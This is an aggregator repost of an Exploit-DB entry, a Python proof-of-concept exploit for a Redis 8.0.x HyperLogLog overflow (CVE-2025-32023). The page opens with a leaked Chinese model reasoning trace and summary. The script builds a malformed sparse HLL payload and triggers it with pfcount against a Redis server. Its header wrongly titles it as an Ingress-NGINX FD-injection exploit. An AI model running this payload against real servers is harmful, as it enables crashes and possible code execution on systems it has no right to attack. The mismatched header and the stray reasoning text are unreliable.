[remote] Redis 8.0.2 - RCE
嗯,用户发来了一个请求,让我帮他总结一篇文章的内容,控制在100个字以内,而且不需要用特定的开头。首先,我需要仔细阅读用户提供的文章内容,理解其主要信息。 这篇文章看起来是一个关于Redis漏洞的 exploit。标题提到了Ingress-NGINX Admission Controller v1.11.1,但实际内容是关于Redis的HyperLogLog数据结构的漏洞。作者是Beatriz Fresno Naumova,日期是2025年10月7日。漏洞影响的是Redis版本8.0.0到8.0.3之间。 文章中有一个Python脚本,主要构造了一个畸形的HLL payload,通过利用xzero函数来制造溢出,进而导致远程代码执行(RCE)。测试环境是Ubuntu 22.04,并且提到了CVE编号CVE-2025-32023。 所以,总结的时候需要包括以下几点:Redis的HyperLogLog漏洞、版本范围、利用方式(畸形payload)、攻击类型(FD注入到RCE)、以及影响范围。同时要注意字数限制在100字以内。 接下来,我需要将这些信息浓缩成简洁的一句话。确保涵盖关键点:软件名称、漏洞类型、利用方法、影响版本和攻击效果。 最后检查一下是否符合用户的要求:中文总结、不超过100字、没有特定开头。 </think> 该文章描述了Redis HyperLogLog数据结构中的一个漏洞(CVE-2025-32023),影响版本8.0.0至8.0.3。通过构造畸形HLL payload触发溢出,实现远程代码执行(RCE)。 2026-2-4 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏 
# Exploit Title:  Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE 
# Date: 2025-10-07
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/
# Version: Affects :>= 8.0.0, < 8.0.3 
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-32023

import redis
import sys

# --- Configuration ---
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_KEY = 'hll:exp'

# HLL encoding type (1 = sparse)
HLL_SPARSE = 1


def p8(value):
    """Convert integer to single byte."""
    return bytes([value])


def xzero(size):
    """
    Construct an 'xzero' run for sparse HLL:
    Creates a run-length encoding entry of zeroes with a specific size.
    """
    if not (1 <= size <= 0x4000):
        raise ValueError("Invalid xzero size: must be between 1 and 0x4000")
    size -= 1
    return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)


def build_malformed_hll():
    """
    Construct a malformed HLL payload that overflows internal counters.
    """
    payload = b'HYLL'                # Magic header
    payload += p8(HLL_SPARSE)        # Encoding type: sparse
    payload += p8(0) * 3             # Reserved
    payload += p8(0) * 8             # Unused (padding)
    
    assert len(payload) == 0x10      # Check header size
    
    # Append enough xzero runs to cause overflow
    payload += xzero(0x4000) * 0x20000  # == -0x80000000 when cast to signed int

    # Add one more run to complete the structure
    payload += p8(0b11111111)  # Runlen=4, regval=0x20 (but malformed)

    return payload


def main():
    try:
        print(f"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...")
        r = redis.Redis(REDIS_HOST, REDIS_PORT)

        print("[*] Building malformed HyperLogLog payload...")
        hll_payload = build_malformed_hll()

        print(f"[*] Writing malformed HLL to key: {REDIS_KEY}")
        r.set(REDIS_KEY, hll_payload)

        print("[*] Triggering HLL merge operation (pfcount)...")
        r.pfcount(REDIS_KEY, REDIS_KEY)

        print("[+] Exploit triggered successfully.")
    except Exception as e:
        print(f"[!] Exploit failed: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()

文章来源: https://www.exploit-db.com/exploits/52477
如有侵权请联系:admin#unsafe.sh